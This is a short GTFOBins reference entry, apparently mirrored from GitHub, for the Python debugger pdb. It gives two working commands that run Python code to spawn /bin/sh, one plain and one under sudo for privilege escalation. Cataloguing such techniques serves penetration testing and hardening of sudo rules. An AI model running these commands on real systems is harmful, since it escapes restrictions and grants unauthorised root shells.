1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 08:16:02 +02:00
GTFOBins.github.io/_gtfobins/pdb.md
2020-03-15 12:35:00 +01:00

374 B

description functions
This allows to execute [`python`](/gtfobins/python/) code, other functions may apply.
shell sudo
code
TF=$(mktemp) echo 'import os; os.system("/bin/sh")' > $TF pdb $TF cont
code
TF=$(mktemp) echo 'import os; os.system("/bin/sh")' > $TF sudo pdb $TF cont